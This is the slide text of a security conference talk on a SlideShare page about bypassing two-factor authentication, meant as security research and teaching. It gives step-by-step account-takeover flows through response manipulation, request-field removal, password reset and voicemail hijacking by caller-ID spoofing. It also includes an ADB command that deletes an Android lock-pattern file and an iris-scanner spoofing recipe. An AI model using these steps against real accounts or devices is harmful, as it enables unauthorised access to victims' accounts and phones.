SlideShare ist ein Scribd-Unternehmen logo
1 von 45
ШАХМЕЕР АМИР
Shahmeer Amir
Обход двухфакторной аутентификации с
использованием наиболее простых
методов.
CEO @ Veiliux
Bypassing Multi Factor Authentication
WHO AM I?
• Penetration Tester and Founder @ Veiliux
• Cyber Security researcher
• Leisurely Bug Bounty Hunter
• M.Sc Security Science
• Pursuing Ph.D in Information Security
AGENDA
• What is 2fa
• Conventional 2fa implementations in Web applications
• Methods of Bypassing 2fa in Web apps
• Methods of bypassing MFA in mobile phones
• Foreword about FaceID
2FA, WHAT IS IT?
Two factor authentication is a method of utilizing
a handheld device as an authenticator for online
portals.
IS 2FA SECURE?
While most organizations consider it a secure
means of authenticating their users into their
portals, there are methods using which two
factor authentication can be bypassed.
SEVERAL 2FA IMPLEMENTATIONS
SMS 3RD PARTY SOFTWARE
2FA WORKFLOW
TYPES OF 2FA TOKENS
There are three different OATH OTP types that
are the most widely used:
• Event based Tokens
• Time-Based Token
• Challenge-Based Token
An OTP system generates event-based
tokens on demand using a combination
of a static random key value.
EVENT BASED TOKEN
An OTP system generates time-based tokens
automatically every so often based on a static
random key value and a dynamic time value
TIME BASED TOKEN
An OTP system generates challenge-based
tokens on demand using a random challenge key
that is provided by the authentication server at
each unique user log-in
CHALLENGE BASED TOKEN
BYPASSING 2FA IN WEB APPS
• Bypassing 2fa in Mapbox (Session Management)
• Bypassing 2fa in an E-Wallet (Response Manipulation)
• Bypassing 2fa in Paypal (Try another way)
• Bypassing 2fa in Recurly (Universal Oauth bug)
• Bypassing 2fa via exploiting voicemail
RECURLY 2FA BYPASS
Cause of vulnerability: Automatic login of users
after password change
User requires a password change
User requests a password reset token
User changes password via the token
Application lets user log automatically after change
RECURLY 2FA BYPASS (Cont.d)
Process Flow:
Attacker has victim’s credentials
Attacker logs in and is faced with the a 2fa page
Attacker requests password reset token
Attacker changes the password and is logged in
RECURLY 2FA BYPASS (Cont.d)
Abusive Scenario
RECURLY 2FA BYPASS (Cont.d)
E-WALLET 2FA BYPASS
Cause of vulnerability: No Verification of
response on client end
E-WALLET 2FA BYPASS
Complete takeover of an accounts using
response manipulation
Attacker logs into account
Attacker puts incorrect response code
Attacker intercepts response with Burp suite Proxy
Attacker changes response code and
corresponding data to 200 OK
E-WALLET 2FA BYPASS
Abusive Scenario:
• Cause of Vulnerability: Secret question request
manipulation
PAYPAL 2FA BYPASS
Paypal 2FA BYPASS
Process Flow:
Attacker logs into account
Attacker selects alternative option to login
Attacker enters incorrect answers
Attacker intercepts request with Burp Suite
Attacker removes “challenge” and “response” fields
Attacker is granted access
Paypal 2FA BYPASS
Abusive Scenario:
• Cause of Vulnerability: Oauth manipulation
RELATEIQ 2FA BYPASS
RELATEIQ 2FA BYPASS
Bypassing 2fa via Oauth
Attacker compromises user’s facebook account
Attacker clicks on “Login via Facebook”
Attacker is granted access to the victim’s account
RELATEIQ 2FA BYPASS
Abusive Scenario:
BYPASSING 2FA VIA VOICEMAIL
Cause of Vulnerability: Exploiting Voicemail
BYPASSING 2FA VIA VOICEMAIL
User logs in
User requests 2fa code via call
User gets a call from someone else at the same time
User’s 2fa code is sent to voice mail
Process Flow:
Attacker logs into the victims account
Attacker engages a call with the victims phone number
Attacker chooses the 2FA code via Phone Call option
As the victim is engaged in the call by the attacker,
the 2FA phone calling service will send the 2FA code
to the victims voicemail, immediately.
Abusive Scenario:
BYPASSING 2FA VIA VOICEMAIL
EXPLOITING VOICEMAIL
Obtain a ANI/Caller ID spoofing service (either
via a VoIP provider) or via a dedicated spoofing
provider.
STEP 1:
EXPLOITING VOICEMAIL
For all the services in the Australian region input
the destination number as: +610411000321.
STEP 2:
EXPLOITING VOICEMAIL
Enter the "Caller ID to Display" as the victim's
mobile number.
STEP 3:
EXPLOITING VOICEMAIL
If you're using SpoofCard, a number and access
code is displayed. Call this number and input the
access code.
STEP 4:
EXPLOITING VOICEMAIL
You will be connected to the victims voicemail
service providers endpoint. In this, input the
victims mobile number and press #.
STEP 5:
EXPLANATION FOR USING VM NO.
• All reseller's use the exact same main services
as Optus does.
• Primary number to call for Voicemail is "321"
• When spoofing, we need the remote number
to call as we are unable to reach "321"
• Austrailian cellular providers provide a remote
number to call, in case customers are
overseas. This number is: +610411000321
2FA BYPASS IN MOBILE PHONES
• Bypassing pattern lock via ADB
• Bypassing S8 Iris scanner
BYPASSING PATTERN LOCK USING ADB
This option will work only when you have
enabled USB Debugging previously on your device
and your PC is allowed to connect via ADB. If you
meet such requirements, it is ideal to use this
method to unlock Samsung lock screen.
How to
• Connect your device to the PC using USB cable
and open Command prompt in ADB directory.
Type the command "adb shell rm
/data/system/gesture.key" and then Enter.
BYPASSING PATTERN LOCK USING ADB
BYPASSING IRIS SCANNER in S8
Take a photo of the person’s eye
Lens Specs: 200 mm
Distance: 15 mm
Print: High Quality Color Copy
Use a Wet lens over it and it will be unlocked
With a sufficient amount of time and complete
access to the phone, you could theoretically
unlock any Galaxy S8 with iris scanning enabled.
LETS SEE, HOW IT IS DONE?
FACE ID, Lets talk
SO, HOW CAN IT BE HACKED?
The Secure Enclave Processor
The images captured by Face ID are kept in the
encrypted memory of Apple’s special
coprocessor, which is called Secure Enclave
Processor
SEP, What is it
Security circuit designed to perform secure
services for the rest of the SOC
SEP has its own set of peripherals accessible by
memory-mapped IO
Dedicated IO lines
Runs its own operating system (SEPOS)
"Bypassing two factor authentication", Shahmeer Amir
The Future of FaceID is based on SEP
• SEP(OS) lacks basic exploit Protections E.g. no
memory layout randomization
• Shared PMGR and PLL are open attack to
attacks
• Inclusion of the fuse source pin should be re-
evaluated
• The demotion functionality appears rather
dangerous
QUESTIONS?

Weitere ähnliche Inhalte

Ähnlich wie "Bypassing two factor authentication", Shahmeer Amir

FIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and InsightsFIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and InsightsFIDO Alliance
 
Seminar-Two Factor Authentication
Seminar-Two Factor AuthenticationSeminar-Two Factor Authentication
Seminar-Two Factor AuthenticationDilip Kr. Jangir
 
FIDO UAF Specifications: Overview & Tutorial
FIDO UAF Specifications: Overview & Tutorial FIDO UAF Specifications: Overview & Tutorial
FIDO UAF Specifications: Overview & Tutorial FIDO Alliance
 
Revolutionizing digital authentication with gsma mobile connect
Revolutionizing digital authentication with gsma mobile connectRevolutionizing digital authentication with gsma mobile connect
Revolutionizing digital authentication with gsma mobile connectKeet Sugathadasa
 
FIDO U2F & UAF Tutorial
FIDO U2F & UAF TutorialFIDO U2F & UAF Tutorial
FIDO U2F & UAF TutorialFIDO Alliance
 
Two factor authentication presentation mcit
Two factor authentication presentation mcitTwo factor authentication presentation mcit
Two factor authentication presentation mcitmmubashirkhan
 
FIDO Specifications Overview: UAF & U2F
FIDO Specifications Overview: UAF & U2FFIDO Specifications Overview: UAF & U2F
FIDO Specifications Overview: UAF & U2FFIDO Alliance
 
Audio card - VoIP - Phonecard
Audio card - VoIP - PhonecardAudio card - VoIP - Phonecard
Audio card - VoIP - PhonecardGuy Romanus
 
FIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and InsightsFIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and InsightsFIDO Alliance
 
Webinar: Beyond Two-Factor: Secure Access Control for Office 365
 Webinar: Beyond Two-Factor: Secure Access Control for Office 365 Webinar: Beyond Two-Factor: Secure Access Control for Office 365
Webinar: Beyond Two-Factor: Secure Access Control for Office 365SecureAuth
 
SOTP_Introduction
SOTP_IntroductionSOTP_Introduction
SOTP_IntroductionJohnson Wu
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdfRavi Aggarwal
 
FIDO-U2F-Case-Study_Hanson.pptx
FIDO-U2F-Case-Study_Hanson.pptxFIDO-U2F-Case-Study_Hanson.pptx
FIDO-U2F-Case-Study_Hanson.pptxVladVlad504281
 
U2F Case Study: Examining the U2F Paradox
U2F Case Study: Examining the U2F ParadoxU2F Case Study: Examining the U2F Paradox
U2F Case Study: Examining the U2F ParadoxFIDO Alliance
 
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CloudIDSummit
 
Passwords are passé. WebAuthn is simpler, stronger and ready to go
Passwords are passé. WebAuthn is simpler, stronger and ready to goPasswords are passé. WebAuthn is simpler, stronger and ready to go
Passwords are passé. WebAuthn is simpler, stronger and ready to goMichael Furman
 

Ähnlich wie "Bypassing two factor authentication", Shahmeer Amir (20)

FIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and InsightsFIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and Insights
 
Passwordless Mobile Banking.pdf
Passwordless Mobile Banking.pdfPasswordless Mobile Banking.pdf
Passwordless Mobile Banking.pdf
 
Seminar-Two Factor Authentication
Seminar-Two Factor AuthenticationSeminar-Two Factor Authentication
Seminar-Two Factor Authentication
 
FIDO UAF Specifications: Overview & Tutorial
FIDO UAF Specifications: Overview & Tutorial FIDO UAF Specifications: Overview & Tutorial
FIDO UAF Specifications: Overview & Tutorial
 
Revolutionizing digital authentication with gsma mobile connect
Revolutionizing digital authentication with gsma mobile connectRevolutionizing digital authentication with gsma mobile connect
Revolutionizing digital authentication with gsma mobile connect
 
FIDO U2F & UAF Tutorial
FIDO U2F & UAF TutorialFIDO U2F & UAF Tutorial
FIDO U2F & UAF Tutorial
 
WSO2 Telco MCX
WSO2 Telco MCXWSO2 Telco MCX
WSO2 Telco MCX
 
Two factor authentication presentation mcit
Two factor authentication presentation mcitTwo factor authentication presentation mcit
Two factor authentication presentation mcit
 
FIDO Specifications Overview: UAF & U2F
FIDO Specifications Overview: UAF & U2FFIDO Specifications Overview: UAF & U2F
FIDO Specifications Overview: UAF & U2F
 
Audio card - VoIP - Phonecard
Audio card - VoIP - PhonecardAudio card - VoIP - Phonecard
Audio card - VoIP - Phonecard
 
FIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and InsightsFIDO UAF 1.0 Specs: Overview and Insights
FIDO UAF 1.0 Specs: Overview and Insights
 
Webinar: Beyond Two-Factor: Secure Access Control for Office 365
 Webinar: Beyond Two-Factor: Secure Access Control for Office 365 Webinar: Beyond Two-Factor: Secure Access Control for Office 365
Webinar: Beyond Two-Factor: Secure Access Control for Office 365
 
SOTP_Introduction
SOTP_IntroductionSOTP_Introduction
SOTP_Introduction
 
iOS Application Security.pdf
iOS Application Security.pdfiOS Application Security.pdf
iOS Application Security.pdf
 
FIDO-U2F-Case-Study_Hanson.pptx
FIDO-U2F-Case-Study_Hanson.pptxFIDO-U2F-Case-Study_Hanson.pptx
FIDO-U2F-Case-Study_Hanson.pptx
 
BIOMETRYsso
BIOMETRYssoBIOMETRYsso
BIOMETRYsso
 
U2F Case Study: Examining the U2F Paradox
U2F Case Study: Examining the U2F ParadoxU2F Case Study: Examining the U2F Paradox
U2F Case Study: Examining the U2F Paradox
 
FIDOAlliance
FIDOAllianceFIDOAlliance
FIDOAlliance
 
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
CIS14: FIDO 101 (What, Why and Wherefore of FIDO)
 
Passwords are passé. WebAuthn is simpler, stronger and ready to go
Passwords are passé. WebAuthn is simpler, stronger and ready to goPasswords are passé. WebAuthn is simpler, stronger and ready to go
Passwords are passé. WebAuthn is simpler, stronger and ready to go
 

Mehr von HackIT Ukraine

"CyberGuard — проект государственно-частного партнерства по созданию киберцен...
"CyberGuard — проект государственно-частного партнерства по созданию киберцен..."CyberGuard — проект государственно-частного партнерства по созданию киберцен...
"CyberGuard — проект государственно-частного партнерства по созданию киберцен...HackIT Ukraine
 
"В поисках уязвимостей мобильных приложений", Алексей Голубев
"В поисках уязвимостей мобильных приложений", Алексей Голубев"В поисках уязвимостей мобильных приложений", Алексей Голубев
"В поисках уязвимостей мобильных приложений", Алексей ГолубевHackIT Ukraine
 
"Безопасность и надежность ПО в техногенном мире", Владимир Обризан
"Безопасность и надежность ПО в техногенном мире", Владимир Обризан"Безопасность и надежность ПО в техногенном мире", Владимир Обризан
"Безопасность и надежность ПО в техногенном мире", Владимир ОбризанHackIT Ukraine
 
"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов
"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов
"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий КайдаловHackIT Ukraine
 
"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов
"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов
"Безопасные Биткоин-транзакции без специального оборудования", Алексей КаракуловHackIT Ukraine
 
"Growth hack в маркетинге и бизнесе", Максим Мирошниченко
"Growth hack в маркетинге и бизнесе", Максим Мирошниченко"Growth hack в маркетинге и бизнесе", Максим Мирошниченко
"Growth hack в маркетинге и бизнесе", Максим МирошниченкоHackIT Ukraine
 
"Как ловят хакеров в Украине", Дмитрий Гадомский
"Как ловят хакеров в Украине", Дмитрий Гадомский"Как ловят хакеров в Украине", Дмитрий Гадомский
"Как ловят хакеров в Украине", Дмитрий ГадомскийHackIT Ukraine
 
"Security Requirements Engineering", Oleksii Baranovskyi
"Security Requirements Engineering", Oleksii Baranovskyi"Security Requirements Engineering", Oleksii Baranovskyi
"Security Requirements Engineering", Oleksii BaranovskyiHackIT Ukraine
 
"Наступну атаку можна попередити", Олександр Чубарук
"Наступну атаку можна попередити", Олександр Чубарук"Наступну атаку можна попередити", Олександр Чубарук
"Наступну атаку можна попередити", Олександр ЧубарукHackIT Ukraine
 
"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin
"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin
"Preventing Loss of Personal Data on a Mobile Network", Oleksii LukinHackIT Ukraine
 
"How to make money with Hacken?", Dmytro Budorin
"How to make money with Hacken?", Dmytro Budorin"How to make money with Hacken?", Dmytro Budorin
"How to make money with Hacken?", Dmytro BudorinHackIT Ukraine
 
"Using cryptolockers as a cyber weapon", Alexander Adamov
"Using cryptolockers as a cyber weapon", Alexander Adamov"Using cryptolockers as a cyber weapon", Alexander Adamov
"Using cryptolockers as a cyber weapon", Alexander AdamovHackIT Ukraine
 
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde..."Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...HackIT Ukraine
 
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ..."Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ...HackIT Ukraine
 
"Introduction to Bug Hunting", Yasser Ali
"Introduction to Bug Hunting", Yasser Ali"Introduction to Bug Hunting", Yasser Ali
"Introduction to Bug Hunting", Yasser AliHackIT Ukraine
 
"Hack it. Found it. Sell it. How hackers can be successful in the business wo...
"Hack it. Found it. Sell it. How hackers can be successful in the business wo..."Hack it. Found it. Sell it. How hackers can be successful in the business wo...
"Hack it. Found it. Sell it. How hackers can be successful in the business wo...HackIT Ukraine
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...HackIT Ukraine
 
Владимир Махитко - Automotive security. New challenges
Владимир Махитко - Automotive security. New challengesВладимир Махитко - Automotive security. New challenges
Владимир Махитко - Automotive security. New challengesHackIT Ukraine
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?HackIT Ukraine
 

Mehr von HackIT Ukraine (20)

"CyberGuard — проект государственно-частного партнерства по созданию киберцен...
"CyberGuard — проект государственно-частного партнерства по созданию киберцен..."CyberGuard — проект государственно-частного партнерства по созданию киберцен...
"CyberGuard — проект государственно-частного партнерства по созданию киберцен...
 
"В поисках уязвимостей мобильных приложений", Алексей Голубев
"В поисках уязвимостей мобильных приложений", Алексей Голубев"В поисках уязвимостей мобильных приложений", Алексей Голубев
"В поисках уязвимостей мобильных приложений", Алексей Голубев
 
"Безопасность и надежность ПО в техногенном мире", Владимир Обризан
"Безопасность и надежность ПО в техногенном мире", Владимир Обризан"Безопасность и надежность ПО в техногенном мире", Владимир Обризан
"Безопасность и надежность ПО в техногенном мире", Владимир Обризан
 
"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов
"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов
"Технология блокчейн: новые возможности и новые уязвимости", Дмитрий Кайдалов
 
"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов
"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов
"Безопасные Биткоин-транзакции без специального оборудования", Алексей Каракулов
 
"Growth hack в маркетинге и бизнесе", Максим Мирошниченко
"Growth hack в маркетинге и бизнесе", Максим Мирошниченко"Growth hack в маркетинге и бизнесе", Максим Мирошниченко
"Growth hack в маркетинге и бизнесе", Максим Мирошниченко
 
"Как ловят хакеров в Украине", Дмитрий Гадомский
"Как ловят хакеров в Украине", Дмитрий Гадомский"Как ловят хакеров в Украине", Дмитрий Гадомский
"Как ловят хакеров в Украине", Дмитрий Гадомский
 
"Security Requirements Engineering", Oleksii Baranovskyi
"Security Requirements Engineering", Oleksii Baranovskyi"Security Requirements Engineering", Oleksii Baranovskyi
"Security Requirements Engineering", Oleksii Baranovskyi
 
"Наступну атаку можна попередити", Олександр Чубарук
"Наступну атаку можна попередити", Олександр Чубарук"Наступну атаку можна попередити", Олександр Чубарук
"Наступну атаку можна попередити", Олександр Чубарук
 
"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin
"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin
"Preventing Loss of Personal Data on a Mobile Network", Oleksii Lukin
 
"How to make money with Hacken?", Dmytro Budorin
"How to make money with Hacken?", Dmytro Budorin"How to make money with Hacken?", Dmytro Budorin
"How to make money with Hacken?", Dmytro Budorin
 
"Using cryptolockers as a cyber weapon", Alexander Adamov
"Using cryptolockers as a cyber weapon", Alexander Adamov"Using cryptolockers as a cyber weapon", Alexander Adamov
"Using cryptolockers as a cyber weapon", Alexander Adamov
 
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde..."Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
"Cryptography, Data Protection, and Security For Start-Ups In The Post Snowde...
 
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ..."Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
"Системы уникализации и идентификации пользователей в сети. Методы защиты от ...
 
"Introduction to Bug Hunting", Yasser Ali
"Introduction to Bug Hunting", Yasser Ali"Introduction to Bug Hunting", Yasser Ali
"Introduction to Bug Hunting", Yasser Ali
 
"Hack it. Found it. Sell it. How hackers can be successful in the business wo...
"Hack it. Found it. Sell it. How hackers can be successful in the business wo..."Hack it. Found it. Sell it. How hackers can be successful in the business wo...
"Hack it. Found it. Sell it. How hackers can be successful in the business wo...
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
Alfonso De Gregorio - Vulnerabilities and Their Surrounding Ethical Questions...
 
Владимир Махитко - Automotive security. New challenges
Владимир Махитко - Automotive security. New challengesВладимир Махитко - Automotive security. New challenges
Владимир Махитко - Automotive security. New challenges
 
Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?Алексей Старов - Как проводить киберраследования?
Алексей Старов - Как проводить киберраследования?
 

Kürzlich hochgeladen

UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsSeth Reyes
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsSafe Software
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAshyamraj55
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdfPedro Manuel
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfDianaGray10
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6DianaGray10
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.YounusS2
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXTarek Kalaji
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Brian Pichman
 

Kürzlich hochgeladen (20)

UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
Computer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and HazardsComputer 10: Lesson 10 - Online Crimes and Hazards
Computer 10: Lesson 10 - Online Crimes and Hazards
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
201610817 - edge part1
201610817 - edge part1201610817 - edge part1
201610817 - edge part1
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdf
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBX
 
Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )Building Your Own AI Instance (TBLC AI )
Building Your Own AI Instance (TBLC AI )
 

"Bypassing two factor authentication", Shahmeer Amir

